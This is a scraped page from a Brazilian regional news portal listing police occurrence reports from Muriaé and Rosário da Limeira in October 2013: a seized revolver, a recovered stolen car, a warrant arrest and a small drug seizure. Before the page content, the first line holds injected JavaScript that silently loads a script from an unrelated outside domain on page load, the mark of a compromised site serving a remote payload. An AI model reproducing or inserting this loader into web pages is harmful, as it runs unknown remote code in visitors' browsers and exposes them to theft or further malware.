;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais em destaque - 75ª Cia PM - 15/110/13. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais em destaque – 75ª Cia PM – 15/110/13.

pmbn

75ª CIA PM – CARANGOLA-MG.

 NADA A REGISTRAR

              76ª CIA PM – MURIAÉ-MG.

             POSSE ILEGAL DE ARMA DE FOGO EM MURIAÉ-MG.

            Em 14/10/2013, às 07h08min, na RUA ITAGIBA DE OLIVEIRA, BAIRRO BARRA,  onde militares compareceram devido uma denúncia de que havia um veículo VW-Gol de cor preta, quatro portas, abandonado em um terreno baldio, e pelo local foi constatado o referido veículo placa GWU-5100, sendo constatado pelos militares que havia um individuo dormindo no banco traseiro do veículo. O suspeito foi acordado e solicitado para que saísse do veículo para busca pessoal e no veiculo, sendo que durante busca foi encontrado um revólver cal.32 nº de série 397672, carregado com cinco munições intactas em um porta objetos próximo ao volante no painel do veículo. O cidadão confirmou que a arma de fogo é dele, sendo dada voz de prisão há V.P.A., de 43 anos, que relatou que na data de 13 outubro de 2013, brigou com sua esposa indo embora de sua residência, chegando ao local por volta das 23:00 horas para dormir. A documentação do referido veículo se encontra irregular e o mesmo não portava nenhuma documentação do veículo gol, sendo o veículo apreendido e removido ao Pátio MARIÉLEN, sendo o autor e a arma conduzido para a Delegacia de Polícia.

 VEÍCULO PRODUTO DE FURTO LOCALIZADO EM MURIAÉ-MG.

            Em 14/10/2013, às 07h44min, na RODOVIA BR 356, ZONA RURAL DO DISTRITO DE VERMELHO, MURIAÉ, militares compareceram no local, onde a testemunha relatou que ao chegar no serviço encontrou o veiculo VW GOL, DE COR BRANCA, PLACA LOW-5538 / MURIAÉ, ora removido, estacionado e que não reconheceu como sendo de nenhum morador dali de perto, sendo constatado pela Sala de Operações do 47BPM, queixa de furto do veiculo, sendo o veículo recolhido ao pátio credenciado do Detran.

 CUMPRIMENTO DE MANDADO DE PRISÃO EM MURIAÉ-MG.

            Em 14/10/2013, às 17h01min, na RUA SEBASTIÃO PROTÁSSIO, BAIRRO JOSÉ CIRILO, militares abordaram o nacional P.J.V., de 23 anos, sendo constatado um mandado de prisão em desfavor do mesmo que foi conduzido para a Delegacia de Polícia de plantão para as demais providências de praxe.

  TRÁFICO ILÍCITO DE DROGAS EM ROSÁRIO DA LIMEIRA-MG.

            Em 14/10/2013, às 19h00min, na FAZENDA SANTA ROSA, ZONA RURAL DE ROSÁRIO DA LIMEIRA, apos varias denuncias de que G.C.S., de 18 anos, estaria comercializando entorpecentes no município, militares através de uma denuncia anônima, dando conta de que o autor estaria na carona de uma motocicleta, transportando uma certa quantidade de  drogas, os militares iniciaram patrulhamento na zona rural, em uma estrada vicinal abordaram uma motocicleta KASINKI FLASH K 150, COR VERMELHA, ANO 2008, PLACA HHA-3928 / MURIAÉ conduzida por F.A.A. , de 24 anos, Juntamente com e G.C.S., de 18 anos, ocupava o carona. Os ocupantes foram submetidos à busca pessoa sendo localizado no bolso esquerdo da bermuda de G.C.S., de 18 anos, uma substancia vegetal, esverdeada, análoga à maconha, e ao ser questionado sobre a origem da substancia, o autor disse que adquiriu na PRAÇA JOÃO PINHEIRO, em MURIAÉ e comprou a substancia pelo valor de R$ 10,00 reais. Ao ser dado busca pessoal em F.A.A. , de 24 anos, foi localizado no interior da sua carteira, duas quantidades, porem, de menor proporção, e uma substancia de cor amarela, que segundo F.A.A. , de 24 anos,, seria uma porção de cocaína para misturar no cigarro de maconha, e que também teria adquirido as substancias em MURIAÉ, ha uns três dias, no bairro PLANALTO, pelo valor de R$ 5,00 reais. Ambos alegaram que as substancias eram para consumo próprio, sendo lavrados alguns Autos de Infrações, referentes a irregularidades constatadas na motocicleta que foi removida para o Pátio credenciado e os autores foram conduzidos para a Delegacia de Polícia de plantão para demais providências.

    ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

 

 

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.